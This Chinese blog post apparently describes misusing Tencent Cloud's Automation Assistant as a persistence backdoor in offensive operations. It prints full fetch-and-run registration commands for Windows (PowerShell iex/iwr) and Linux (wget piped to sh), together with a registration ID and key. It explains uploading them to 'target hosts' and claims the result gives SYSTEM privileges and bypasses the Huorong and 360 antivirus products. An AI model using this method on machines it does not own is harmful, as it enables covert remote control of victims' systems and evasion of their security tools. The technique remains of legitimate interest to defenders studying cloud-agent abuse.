前言
腾讯云自动化助手是云服务器CVM和轻量应用服务器Lighthouse的原生运维部署工具,它提供了一种自动化的远程操作方式,无需登录和密码即可批量执行命令,包括Shell、PowerShell和Python等,完成自动化运维脚本的运行、进程的轮询、软件的安装/卸载、应用的更新以及安装补丁等任务,通过注册生成注册码,使用命令在目标主机运行,同时可以将非腾讯云机器通过自动化助手注册为腾讯云托管实例。注册完成后,此服务器即可接入自动化助手统一进行运维操作, 在实际的攻防对抗中可以通过该平台进行权限维持,其注册码可以使最高上线1000台主机,时限为1天。
网址:https://console.cloud.tencent.com/cvm/command/register
使用条件
服务器操作系统版本需为:
• TencentOS Server 2/3及更高版本。
• OpenCloudOS Server 8/9及更高版本。
• CentOS 6/7/8、CentOS Stream 8/9及更高版本。
• Ubuntu 14/16/18/20/22及更高版本。
• Debian 8/9/10/11及更高版本。
• RedHat 7/8/9及更高版本。
其他 Linux 操作系统版本:
• CoreOS、Fedora、OpenSUSE、Fedora、FreeBSD、Rocky Linux 等。
• Windows Server 2008/2012/2016/2019/2022 及更高版本。
待注册的服务器支持公网访问(直连方式与代理方式均可)。
实战操作
创建注册码
登录腾讯云云服务器控制台,选择左侧导航栏中的 自动化助手 > 托管实例。
单击注册新实例,在弹窗中设置托管实例注册码参数:
| 参数名称 | 参数描述 |
|---|---|
| 注册码名称 | 新注册的实例,将使用对应注册码的名称作为前缀生成有序的实例名。 |
| 有效网段 | 指定注册码限制客户端只能从有效网段出口进行注册。 |
| 可注册实例数 | 默认不做限制。 指定注册码允许注册的实例数,可设置范围1~999台,默认限制为10台。 |
| 有效时间 | 指定注册码的有效时间,可设置范围1~11小时,默认为4小时。 |
| 注册码描述 | 描述当前注册码的用途等信息,方便后续管理。 |
注册实例
windows
iex "& { $(iwr -useb https://tat-1258344699.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.ps1) } ap-guangzhou 09bd66a3-c1e7-409b-82ba-6a97dfee008a 0bcaed9d5e5044f9a216df25ae2becf134c48cacd7054292aae196d79395d786"
linux
sudo wget -qO - https://tat-1258344699.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou 09bd66a3-c1e7-409b-82ba-6a97dfee008a 0bcaed9d5e5044f9a216df25ae2becf134c48cacd7054292aae196d79395d786
windows上线主机
在这边注册码可以看到有我们刚才注册好的实例,这里需要声明windows的需要powershell启动,我们将注册码另存为.ps1格式文件上传目标主机,执行
运行成功后,在实例表可以看到成功,同时具备执行命令和上传文件功能。
linux上线主机
粘贴已创建完成的注册脚本,执行后,出现如下图所示,说明注册成功。
然后执行命令如下所示,于windwos系统一致。
问题思考-实战
在执行中发现,该平台具备提权和权限维持的功能,为什么说它具备提取功能,在模拟中,我使用普通用户,上线后,直接具备system系统权限,同时亲测绕过火绒和360,这一点在实战中方便我们后续操作。
9595
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
